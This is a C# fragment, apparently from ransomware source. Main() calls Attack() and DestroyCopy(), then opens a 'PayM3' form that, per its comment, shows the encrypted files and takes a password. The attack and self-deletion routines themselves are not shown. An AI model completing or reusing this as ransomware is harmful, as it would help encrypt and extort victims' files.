static void CreateUI() { Application.EnableVisualStyles(); Application.SetCompatibleTextRenderingDefault(false); PayM3 thx = new PayM3(); Application.Run(thx); }
static void Main() { //Start the attack Attack(); //Destroy copy DestroyCopy(); //Creates a popup that lets you view the encrypted files and add the password Application.EnableVisualStyles(); Application.SetCompatibleTextRenderingDefault(false); PayM3 thx = new PayM3(); Application.Run(thx); }